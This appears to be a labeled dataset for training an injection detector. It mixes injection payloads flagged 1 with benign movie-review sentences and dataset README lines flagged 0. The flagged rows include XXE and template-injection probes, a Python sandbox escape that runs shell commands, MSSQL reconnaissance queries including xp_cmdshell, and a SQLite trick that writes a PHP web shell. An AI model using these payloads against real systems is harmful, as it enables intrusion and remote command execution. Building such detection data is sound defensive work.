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52 |
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53 |
54 |
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56 |
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71 |
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"<data xmlns:xi=""""><xi:include href=""""></xi:include></dat",1
98 |
{{ request }},1
99 |
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100 |
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101 |
"{% include ""x.html"" %}",1
102 |
"{% extends ""x.html"" %}",1
103 |
104 |
"().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__(""os"").popen(""ls /"").read()' )",1
105 |
SELECT @@version,1
106 |
107 |
108 |
SELECT 1 -- comment,1
109 |
SELECT /*comment*/1,1
110 |
SELECT user_name(),1
111 |
SELECT system_user,1
112 |
SELECT user,1
113 |
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID,1
114 |
select IS_SRVROLEMEMBER('sysadmin'),1
115 |
select IS_SRVROLEMEMBER('db_owner'),1
116 |
SELECT name FROM master..syslogins,1
117 |
SELECT name FROM master..sysdatabases,1
118 |
"select concat_ws(table_schema,table_name,column_name) from information_schema.columns",1
119 |
select quotename(name) from master..sysdatabases FOR XML PATH(''),1
120 |
EXEC xp_cmdshell 'net user',1
121 |
SELECT char(0x41),1
122 |
SELECT ascii('A'),1
123 |
SELECT char(65)+char(66) => return AB,1
124 |
WAITFOR DELAY '0:0:3' pause for 3 seconds,1
125 |
126 |
id=1 union:select password from:user,1
127 |
select text from sys.dm_exec_requests cross apply sys.dm_exec_sql_text(sql_handle),1
128 |
select host_name(),1
129 |
exec xp_getnetname,1
130 |
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131 |
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132 |
"exec xp_regread N'HKEY_LOCAL_MACHINE', N'SYSTEM\CurrentControlSet\Services\MSSEARCH'",1
133 |
ATTACH DATABASE '/var/www/lol.php' AS lol;,1
134 |
CREATE TABLE lol.pwn (dataz text);,1
135 |
INSERT INTO lol.pwn (dataz) VALUES ('<?system($_GET['cmd']); ?>');--,1
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q34out3ugui 43,0
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h5 jq34ijl,0
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"3. sentiment_labels.txt contains all phrase ids and the corresponding sentiment labels, separated by a vertical line.",0
150 |
Note that you can recover the 5 classes by mapping the positivity probability using the following cut-offs:,0
151 |
"[0, 0.2], (0.2, 0.4], (0.4, 0.6], (0.6, 0.8], (0.8, 1.0]",0
152 |
"for very negative, negative, neutral, positive, very positive, respectively.",0
153 |
Please note that phrase ids and sentence ids are not the same.,0
154 |
"If nothing else, this movie introduces a promising, unusual kind of psychological horror.",0
155 |
"In a normal screen process, these bromides would be barely enough to sustain an interstitial program on the Discovery Channel. But in Imax 3-D, the clichés disappear into the vertiginous perspectives opened up by the photography.",0
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Writer-director Burger imaginatively fans the embers of a dormant national grief and curiosity that has calcified into chronic cynicism and fear.,0
157 |
...a roller-coaster ride of a movie,0
158 |
"I enjoyed Time of Favor while I was watching it, but I was surprised at how quickly it faded from my memory.",0
159 |
"Chicago is sophisticated, brash, sardonic, completely joyful in its execution.",0
160 |
Steve Irwin's method is Ernest Hemmingway at accelerated speed and volume.,0
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A refreshing Korean film about five female high school friends who face an uphill battle when they try to take their relationships into deeper waters.,0
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"On the surface, it's a lovers-on-the-run crime flick, but it has a lot in common with Piesiewicz's and Kieslowski's earlier work, films like The Double Life of Veronique.",0
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"The values that have held the Enterprise crew together through previous adventures and perils do so again-courage, self-sacrifice and patience under pressure.",0
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"If it's possible for a sequel to outshine the original, then SL2 does just that.",0
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A romantic comedy that operates by the rules of its own self-contained universe.,0
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"Enormously likable, partly because it is aware of its own grasp of the absurd.",0
167 |
"Here's a British flick gleefully unconcerned with plausibility, yet just as determined to entertain you.",0
168 |
"It's an old story, but a lively script, sharp acting and partially animated interludes make Just a Kiss seem minty fresh.",0
169 |
Must be seen to be believed.,0
170 |
"Ray Liotta and Jason Patric do some of their best work in their underwritten roles, but don't be fooled: Nobody deserves any prizes here.",0
171 |
"Everything that has to do with Yvan and Charlotte, and everything that has to do with Yvan's rambunctious, Jewish sister and her non-Jew husband, feels funny and true.",0
172 |
"The year's happiest surprise, a movie that deals with a real subject in an always surprising way.",0
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Fans of Behan's work and of Irish movies in general will be rewarded by Borstal Boy.,0
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"Its mysteries are transparently obvious, and it's too slowly paced to be a thriller. (But it's) worth recommending because of two marvelous performances by Michael Caine and Brendan Fraser.",0
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"The film is faithful to what one presumes are the book's twin premises -- that we become who we are on the backs of our parents, but we have no idea who they were at our age; and that time is a fleeting and precious commodity no matter how old you are.",0
176 |
Stephen Earnhart's homespun documentary Mule Skinner Blues has nothing but love for its posse of trailer park denizens.,0
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A solidly seaworthy chiller.,0
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If you can get past the fantastical aspects and harsh realities of ``The Isle'' you'll get a sock-you-in-the-eye flick that is a visual tour-de-force and a story that is unlike any you will likely see anywhere else.,0
179 |
"There are as many misses as hits, but ultimately, it finds humor in the foibles of human behavior, and it's a welcome return to the roots of a genre that should depend on surprises.",0
180 |
A well-made thriller with a certain level of intelligence and non-reactionary morality.,0
181 |
"There's enough science to make it count as educational, and enough beauty to make it unforgettable.",0
182 |
"Remains a solid, if somewhat heavy-handed, account of the near-disaster...done up by Howard with a steady, if not very imaginative, hand.",0
183 |
Makmalbaf follows a resolutely realistic path in this uncompromising insight into the harsh existence of the Kurdish refugees of Iran's borderlands.,0
184 |
"For a good chunk of its running time, Trapped is an effective and claustrophobic thriller.",0
185 |
Most of Crush is a clever and captivating romantic comedy with a welcome pinch of tartness.,0
186 |
Nair does capture the complexity of a big family and its trials and tribulations...,0
187 |
"The seaside splendor and shallow, beautiful people are nice to look at while you wait for the story to get going.",0
188 |
Rare is the 'urban comedy' that even attempts the insight and honesty of this disarming indie.,0
189 |
Ranks among Willams' best screen work.,0
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Engagingly captures the maddening and magnetic ebb and flow of friendship.,0
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